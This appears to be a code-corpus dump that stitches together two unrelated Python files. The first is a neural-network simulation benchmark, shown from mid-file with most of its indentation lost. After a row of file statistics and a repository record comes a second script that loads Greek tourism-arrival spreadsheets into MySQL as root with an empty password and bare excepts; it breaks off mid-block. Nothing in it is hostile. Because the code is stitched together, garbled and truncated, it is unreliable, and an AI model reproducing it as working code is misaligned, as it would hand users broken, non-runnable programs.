Iapp = np.matmul(inputConnectivity,inputVals) # Apply external current sources to their destinations
Gnon = np.maximum(0, np.minimum(GmaxNon * Ulast/R, GmaxNon))
Gspike = Gspike * (1 - timeFactorSynapse)
Gsyn = Gnon + Gspike
Isyn = np.sum(Gsyn * DelE, axis=1) - Ulast * np.sum(Gsyn, axis=1)
U = Ulast + timeFactorMembrane * (-Gm * Ulast + Ib + Isyn + Iapp) # Update membrane potential
theta = thetaLast + timeFactorThreshold * (-thetaLast + theta0 + m * Ulast) # Update the firing thresholds
spikes = np.sign(np.minimum(0, theta + U * (-1 + refCtr))) # Compute which neurons have spiked
Gspike = np.maximum(Gspike, (-spikes) * GmaxSpk) # Update the conductance of connections which spiked
U = U * (spikes + 1) # Reset the membrane voltages of neurons which spiked
refCtr = np.maximum(0, refCtr - spikes * (refPeriod + 1) - 1) # Update refractory periods
outputVoltages = np.matmul(outputVoltageConnectivity, U) # Copy desired neural quantities to output nodes
outputSpikes = np.matmul(outputSpikeConnectivity, spikes) # Copy desired neural quantities to output nodes
Ulast = np.copy(U) # Copy the current membrane voltage to be the past value
thetaLast = np.copy(theta) # Copy the current threshold value to be the past value
end = time.time()
return U, Ulast, thetaLast, Gspike, refCtr, outputVoltages, outputSpikes, end-start
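# The spike detection in stepAll is a vectorized trick: np.sign(np.minimum(0, theta + U * (-1 + refCtr)))
# evaluates to -1 for neurons at or above threshold (and not refractory) and to 0 otherwise.
# Worked example with illustrative values theta = [1.0, 1.0], U = [1.5, 0.5], refCtr = [0, 0]:
#   theta + U * (-1 + refCtr) = [-0.5, 0.5] -> np.minimum(0, .) = [-0.5, 0.0] -> np.sign = [-1, 0]
# so U * (spikes + 1) resets the spiking neuron to 0 and leaves the other unchanged.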
def stepNoRef(inputConnectivity, inputVals, Ulast, timeFactorMembrane, Gm, Ib, thetaLast, timeFactorThreshold, theta0, m, GmaxNon,
GmaxSpk, Gspike, timeFactorSynapse, DelE, outputVoltageConnectivity, outputSpikeConnectivity, R=20):
"""
There is no refractory period
:param inputConnectivity: Matrix describing routing of input currents
:param inputVals: Value of input currents (nA)
:param Ulast: Vector of neural states at the previous timestep (mV)
:param timeFactorMembrane: Vector of constant parameters for each neuron (dt/Cm)
:param Gm: Vector of membrane conductances (uS)
:param Ib: Vector of bias currents (nA)
:param thetaLast: Firing threshold at the previous timestep (mV)
:param timeFactorThreshold: Vector of constant parameters for each neuron (dt/tauTheta)
:param theta0: Vector of initial firing thresholds (mV)
:param m: Vector of threshold adaptation ratios
:param GmaxNon: Matrix of maximum nonspiking synaptic conductances (uS)
:param GmaxSpk: Matrix of maximum spiking synaptic conductances (uS)
:param Gspike: Matrix of spiking synaptic conductances (uS)
:param timeFactorSynapse: Matrix of constant parameters for each synapse (dt/tau_syn)
:param DelE: Matrix of synaptic reversal potentials
:param outputVoltageConnectivity: Matrix describing routes to output nodes
:param outputSpikeConnectivity: Matrix describing routes to output nodes
:param R: Range of neural activity (mV)
    :return: U, Ulast, thetaLast, Gspike, outputVoltages, outputSpikes, and the elapsed step time (s)
"""
start = time.time()
Iapp = np.matmul(inputConnectivity,inputVals) # Apply external current sources to their destinations
Gnon = np.maximum(0, np.minimum(GmaxNon * Ulast/R, GmaxNon))
Gspike = Gspike * (1 - timeFactorSynapse)
Gsyn = Gnon + Gspike
Isyn = np.sum(Gsyn * DelE, axis=1) - Ulast * np.sum(Gsyn, axis=1)
U = Ulast + timeFactorMembrane * (-Gm * Ulast + Ib + Isyn + Iapp) # Update membrane potential
theta = thetaLast + timeFactorThreshold * (-thetaLast + theta0 + m * Ulast) # Update the firing thresholds
spikes = np.sign(np.minimum(0, theta - U)) # Compute which neurons have spiked
Gspike = np.maximum(Gspike, (-spikes) * GmaxSpk) # Update the conductance of connections which spiked
U = U * (spikes + 1) # Reset the membrane voltages of neurons which spiked
outputVoltages = np.matmul(outputVoltageConnectivity, U) # Copy desired neural quantities to output nodes
outputSpikes = np.matmul(outputSpikeConnectivity, spikes) # Copy desired neural quantities to output nodes
Ulast = np.copy(U) # Copy the current membrane voltage to be the past value
thetaLast = np.copy(theta) # Copy the current threshold value to be the past value
end = time.time()
return U, Ulast, thetaLast, Gspike, outputVoltages, outputSpikes, end - start
def stepNoSpike(inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,GmaxNon,DelE,outputConnectivity,R=20):
"""
No neurons can be spiking
:param inputConnectivity: Matrix describing routing of input currents
:param inputVals: Value of input currents (nA)
:param Ulast: Vector of neural states at the previous timestep (mV)
:param timeFactorMembrane: Vector of constant parameters for each neuron (dt/Cm)
:param Gm: Vector of membrane conductances (uS)
:param Ib: Vector of bias currents (nA)
:param GmaxNon: Matrix of maximum nonspiking synaptic conductances (uS)
:param DelE: Matrix of synaptic reversal potentials
:param outputConnectivity: Matrix describing routes to output nodes
:param R: Range of neural activity (mV)
    :return: U, Ulast, outputNodes, and the elapsed step time (s)
"""
start = time.time()
Iapp = np.matmul(inputConnectivity,inputVals) # Apply external current sources to their destinations
Gsyn = np.maximum(0, np.minimum(GmaxNon * Ulast/R, GmaxNon))
Isyn = np.sum(Gsyn * DelE, axis=1) - Ulast * np.sum(Gsyn, axis=1)
U = Ulast + timeFactorMembrane * (-Gm * Ulast + Ib + Isyn + Iapp) # Update membrane potential
outputNodes = np.matmul(outputConnectivity,U) # Copy desired neural quantities to output nodes
Ulast = np.copy(U) # Copy the current membrane voltage to be the past value
end = time.time()
    return U, Ulast, outputNodes, end - start
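# Minimal usage sketch for the non-spiking path (argument values are illustrative):
# constructNoSpike (defined below) returns its tuple in the same positional order that
# stepNoSpike consumes it, so one simulation step is simply:
#   params = constructNoSpike(0.001, 10, 0.5, 0.1, 0.1)
#   U, Ulast, outputs, elapsed = stepNoSpike(*params)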
"""
########################################################################################################################
NETWORK CONSTRUCTION
Construct testing networks using specifications
"""
def constructAll(dt, numNeurons, probConn, perIn, perOut, perSpike, seed=0):
"""
All elements are present
:param dt: Simulation timestep (ms)
:param numNeurons: Number of neurons in the network
:param probConn: Percent of network which is connected
:param perIn: Percent of input nodes in the network
:param perOut: Percent of output nodes in the network
:param perSpike: Percent of neurons which are spiking
:param seed: Random seed
:return: All of the parameters required to run a network
"""
# Inputs
numInputs = int(perIn*numNeurons)
if numInputs == 0:
numInputs = 1
inputVals = np.zeros(numInputs)+1.0
inputConnectivity = np.zeros([numNeurons,numInputs]) + 1
# Construct neurons
Ulast = np.zeros(numNeurons)
numSpike = int(perSpike*numNeurons)
Cm = np.zeros(numNeurons) + 5.0 # membrane capacitance (nF)
Gm = np.zeros(numNeurons) + 1.0 # membrane conductance (uS)
Ib = np.zeros(numNeurons) + 10.0 # bias current (nA)
timeFactorMembrane = dt/Cm
# Threshold stuff
theta0 = np.zeros(numNeurons)
for i in range(numNeurons):
if i >= numSpike:
theta0[i] = sys.float_info.max
else:
theta0[i] = 1.0
thetaLast = np.copy(theta0)
m = np.zeros(numNeurons)
tauTheta = np.zeros(numNeurons)+1.0
timeFactorThreshold = dt/tauTheta
# Refractory period
refCtr = np.zeros(numNeurons)
refPeriod = np.zeros(numNeurons)+1
# Synapses
GmaxNon = np.zeros([numNeurons,numNeurons])
GmaxSpk = np.zeros([numNeurons,numNeurons])
Gspike = np.zeros([numNeurons,numNeurons])
DelE = np.zeros([numNeurons,numNeurons])
tauSyn = np.zeros([numNeurons, numNeurons])+1
np.random.seed(seed)
for row in range(numNeurons):
for col in range(numNeurons):
rand = np.random.uniform()
if rand < probConn:
DelE[row][col] = 100
if theta0[col] < sys.float_info.max:
GmaxSpk[row][col] = 1
else:
GmaxNon[row][col] = 1
tauSyn[row][col] = 2
timeFactorSynapse = dt/tauSyn
# Outputs
numOutputs = int(perOut*numNeurons)
if numOutputs == 0:
numOutputs = 1
outputVoltageConnectivity = np.zeros([numOutputs,numNeurons])
for i in range(numOutputs):
outputVoltageConnectivity[i][i] = 1
outputSpikeConnectivity = np.copy(outputVoltageConnectivity)
return (inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,thetaLast,timeFactorThreshold,theta0,m,refCtr,
refPeriod,GmaxNon,GmaxSpk,Gspike,timeFactorSynapse,DelE,outputVoltageConnectivity,outputSpikeConnectivity)
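# constructAll returns its tuple in the exact positional order that stepAll expects, so a
# full-featured network can be built and stepped with (illustrative arguments):
#   params = constructAll(0.001, 100, 0.1, 0.08, 0.12, 0.5)
#   results = stepAll(*params)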
def constructNoRef(dt,numNeurons,perConn,perIn,perOut,perSpike,seed=0):
"""
No refractory period
:param dt: Simulation timestep (ms)
:param numNeurons: Number of neurons in the network
:param perConn: Percent of network which is connected
:param perIn: Percent of input nodes in the network
:param perOut: Percent of output nodes in the network
:param perSpike: Percent of neurons which are spiking
:param seed: Random seed
:return: All of the parameters required to run a network
"""
# Inputs
numInputs = int(perIn*numNeurons)
inputVals = np.zeros(numInputs)+1.0
inputConnectivity = np.zeros([numNeurons,numInputs]) + 1
# Construct neurons
Ulast = np.zeros(numNeurons)
numSpike = int(perSpike*numNeurons)
Cm = np.zeros(numNeurons) + 5.0 # membrane capacitance (nF)
Gm = np.zeros(numNeurons) + 1.0 # membrane conductance (uS)
Ib = np.zeros(numNeurons) + 10.0 # bias current (nA)
timeFactorMembrane = dt/Cm
# Threshold stuff
theta0 = np.zeros(numNeurons)
for i in range(numNeurons):
if i >= numSpike:
theta0[i] = sys.float_info.max
else:
theta0[i] = 1.0
thetaLast = np.copy(theta0)
m = np.zeros(numNeurons)
tauTheta = np.zeros(numNeurons)+1.0
timeFactorThreshold = dt/tauTheta
# Synapses
GmaxNon = np.zeros([numNeurons,numNeurons])
GmaxSpk = np.zeros([numNeurons,numNeurons])
Gspike = np.zeros([numNeurons,numNeurons])
DelE = np.zeros([numNeurons,numNeurons])
tauSyn = np.zeros([numNeurons, numNeurons])+1
    np.random.seed(seed)
    for row in range(numNeurons):
        for col in range(numNeurons):
            rand = np.random.uniform()
            if rand < perConn:  # was `probConn`, which is not defined in this function's scope
DelE[row][col] = 100
if theta0[col] < sys.float_info.max:
GmaxSpk[row][col] = 1
else:
GmaxNon[row][col] = 1
tauSyn[row][col] = 2
timeFactorSynapse = dt/tauSyn
# Outputs
numOutputs = int(perOut*numNeurons)
outputVoltageConnectivity = np.zeros([numOutputs, numNeurons])
for i in range(numOutputs):
outputVoltageConnectivity[i][i] = 1
outputSpikeConnectivity = np.copy(outputVoltageConnectivity)
return (inputConnectivity, inputVals, Ulast, timeFactorMembrane, Gm, Ib, thetaLast, timeFactorThreshold, theta0, m,
GmaxNon, GmaxSpk, Gspike, timeFactorSynapse, DelE, outputVoltageConnectivity, outputSpikeConnectivity)
def constructNoSpike(dt,numNeurons,perConn,perIn,perOut,seed=0):
"""
No spiking elements
:param dt: Simulation timestep (ms)
:param numNeurons: Number of neurons in the network
:param perConn: Percent of network which is connected
:param perIn: Percent of input nodes in the network
:param perOut: Percent of output nodes in the network
:param seed: Random seed
:return: All of the parameters required to run a network
"""
# Inputs
numInputs = int(perIn*numNeurons)
inputVals = np.zeros(numInputs)+1.0
inputConnectivity = np.zeros([numNeurons,numInputs]) + 1
# Construct neurons
Ulast = np.zeros(numNeurons)
Cm = np.zeros(numNeurons) + 5.0 # membrane capacitance (nF)
Gm = np.zeros(numNeurons) + 1.0 # membrane conductance (uS)
Ib = np.zeros(numNeurons) + 10.0 # bias current (nA)
timeFactorMembrane = dt/Cm
# Synapses
GmaxNon = np.zeros([numNeurons,numNeurons])
DelE = np.zeros([numNeurons,numNeurons])
    np.random.seed(seed)
    for row in range(numNeurons):
        for col in range(numNeurons):
            rand = np.random.uniform()
            if rand < perConn:  # was `probConn`, which is not defined in this function's scope
DelE[row][col] = 100
GmaxNon[row][col] = 1
# Outputs
numOutputs = int(perOut*numNeurons)
outputConnectivity = np.zeros([numOutputs,numNeurons])
for i in range(numOutputs):
outputConnectivity[i][i] = 1
return inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,GmaxNon,DelE,outputConnectivity
"""
########################################################################################################################
TESTING
"""
# All components:
# Testing parameters
dt = 0.001
perIn = 0.08
perOut = 0.12
numSizeSamples = 100
numSpikeSamples = 1
numConnSamples = 10
numSteps = 1000
networkSize = np.logspace(1,4,num=numSizeSamples)
# percentSpiking = np.linspace(0.0,1.0,num=numSpikeSamples)
percentSpiking = [0]
probConnectivity = np.logspace(0, 1, num=numConnSamples) / 10
start = time.time()
# parameters = {'networkSize': networkSize,
# 'probConnectivity': probConnectivity}
#
# # Testing data (no spike)
# timeData = np.zeros([numSizeSamples,numConnSamples,numSteps])
# data = {'dim1': 'networkSize',
# 'dim2': 'probConnectivity'}
# # Collection loop (no spike)
# for size in range(numSizeSamples):
# for probConn in range(numConnSamples):
# print('No Spike: Size %d/%d, Percent Spiking 0/0, Percent Connectivity %d/%d' % ((size+1), numSizeSamples, (probConn + 1), numConnSamples))
# print('Running for %f seconds' % (time.time() - start))
# (input_connectivity,inputVals,u_last,time_factor_membrane,g_m,i_b,
# g_max_non,del_e,outputConnectivity) = constructNoSpike(dt, int(networkSize[size]),probConnectivity[probConn],perIn,perOut)
# tStep = np.zeros(numSteps)
# for step in range(numSteps):
# # print(' %d'%step)
# (_,u_last,_,tStep[step]) = stepNoSpike(input_connectivity,inputVals,u_last,
# time_factor_membrane,g_m,i_b,g_max_non,del_e,outputConnectivity)
# timeData[size][probConn][:] = tStep
#
# data['data'] = timeData
# numpyNoSpikeTest = {'params': parameters,'data': data}
# pickle.dump(numpyNoSpikeTest, open('dataNumpyNoSpike.p','wb'))
parameters = {'networkSize': networkSize,
'percentSpiking': percentSpiking,
'probConnectivity': probConnectivity}
# Testing data (no ref)
timeData = np.zeros([numSizeSamples,numSpikeSamples,numConnSamples,numSteps])
data = {'dim1': 'networkSize',
'dim2': 'percentSpiking',
'dim3': 'probConnectivity'}
# Collection loop (no ref)
for size in range(numSizeSamples):
for perSpike in range(numSpikeSamples):
for probConn in range(numConnSamples):
            print('No Ref: Size %d/%d, Percent Spiking %d/%d, Percent Connectivity %d/%d' % ((size+1), numSizeSamples, (perSpike+1), numSpikeSamples, (probConn + 1), numConnSamples))
print('Running for %f seconds' % (time.time() - start))
(inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,thetaLast, timeFactorThreshold, theta0, m,
GmaxNon,GmaxSpk,
Gspike,timeFactorSynapse,DelE,
outputVoltageConnectivity,outputSpikeConnectivity) = constructNoRef(dt, int(networkSize[size]),
probConnectivity[probConn], perIn,
perOut,percentSpiking[perSpike])
tStep = np.zeros(numSteps)
for step in range(numSteps):
# print(' %d'%step)
(_,Ulast,thetaLast,Gspike,_,_,tStep[step]) = stepNoRef(inputConnectivity,inputVals,Ulast,
timeFactorMembrane,Gm,Ib,thetaLast,
timeFactorThreshold,theta0,m,GmaxNon,GmaxSpk,
Gspike,timeFactorSynapse,DelE,outputVoltageConnectivity,outputSpikeConnectivity)
timeData[size][perSpike][probConn][:] = tStep
data['data'] = timeData
numpyNoRefTest = {'params': parameters,'data': data}
pickle.dump(numpyNoRefTest, open('dataNumpyNoRef.p','wb'))
parameters = {'networkSize': networkSize,
'percentSpiking': percentSpiking,
'probConnectivity': probConnectivity}
# Testing data (all)
timeData = np.zeros([numSizeSamples,numSpikeSamples,numConnSamples,numSteps])
data = {'dim1': 'networkSize',
'dim2': 'percentSpiking',
'dim3': 'probConnectivity'}
# Collection loop (all)
for size in range(numSizeSamples):
for perSpike in range(numSpikeSamples):
for probConn in range(numConnSamples):
print('All: Size %d/%d, Percent Spiking %d/%d, Percent Connectivity %d/%d' % ((size+1), numSizeSamples, (perSpike+1), numSpikeSamples, (probConn + 1), numConnSamples))
print('Running for %f seconds'%(time.time()-start))
(inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,thetaLast, timeFactorThreshold, theta0, m,
refCtr,refPeriod,GmaxNon,GmaxSpk,
Gspike,timeFactorSynapse,DelE,outputVoltageConnectivity,outputSpikeConnectivity) = constructAll(dt, int(networkSize[size]),
probConnectivity[probConn], perIn, perOut,
percentSpiking[perSpike])
tStep = np.zeros(numSteps)
for step in range(numSteps):
# print(' %d'%step)
(_,Ulast,thetaLast,Gspike,refCtr,_,_,tStep[step]) = stepAll(inputConnectivity,inputVals,Ulast,
timeFactorMembrane,Gm,Ib,thetaLast,
timeFactorThreshold,theta0,m,refCtr,
refPeriod,GmaxNon,GmaxSpk,Gspike,
timeFactorSynapse,DelE,
outputVoltageConnectivity,outputSpikeConnectivity)
timeData[size][perSpike][probConn][:] = tStep
data['data'] = timeData
numpyAllTest = {'params': parameters,'data': data}
pickle.dump(numpyAllTest, open('dataNumpyAll.p','wb'))
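# The pickled results can be reloaded for analysis (sketch):
#   results = pickle.load(open('dataNumpyAll.p', 'rb'))
#   timeData = results['data']['data']  # shape: [networkSize, percentSpiking, probConnectivity, numSteps]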
| 48.272331 | 182 | 0.622151 | 2,311 | 22,157 | 5.947642 | 0.116833 | 0.023936 | 0.043288 | 0.023572 | 0.876319 | 0.849036 | 0.835213 | 0.828883 | 0.821244 | 0.795126 | 0 | 0.010597 | 0.271697 | 22,157 | 458 | 183 | 48.377729 | 0.841172 | 0.382046 | 0 | 0.716049 | 0 | 0.00823 | 0.033809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024691 | false | 0 | 0.016461 | 0 | 0.065844 | 0.016461 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e8b05aec661978384643afc0a1c4e1ed288c4b91 | 56,707 | py | Python | meso_excel_to_mysql.py | GiannisProkopiou/Python-GreeceArrivals | da4521d86987cd5f468681698e8ec90beaca4fd0 | [
"MIT"
] | null | null | null | meso_excel_to_mysql.py | GiannisProkopiou/Python-GreeceArrivals | da4521d86987cd5f468681698e8ec90beaca4fd0 | [
"MIT"
] | null | null | null | meso_excel_to_mysql.py | GiannisProkopiou/Python-GreeceArrivals | da4521d86987cd5f468681698e8ec90beaca4fd0 | [
"MIT"
] | null | null | null | import openpyxl
import xlrd
import MySQLdb
import mysql.connector
def meso_excel_to_mysql():
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
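    # Note: every block in this function repeats the same workbook-to-table routine with a
    # different file path, sheet name, and table name. A minimal consolidation sketch
    # (hypothetical helper; the names are illustrative, not part of the original code):
    #
    #   def load_meso_sheet(excel_file_path, sheet_name, table_name):
    #       data_sheet = xlrd.open_workbook(excel_file_path).sheet_by_name(sheet_name)
    #       ...  # connect, CREATE TABLE, INSERT and SELECT exactly as in the block above
    #
    #   for path, sheet, table in [('D:/Python_Project_Compilers/meso_2011_b.xls', 'ΙΟΥΝ', 'meso_2011_b'), ...]:
    #       load_meso_sheet(path, sheet, table)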
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total )
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2011_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2011_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2011_d( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2011_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
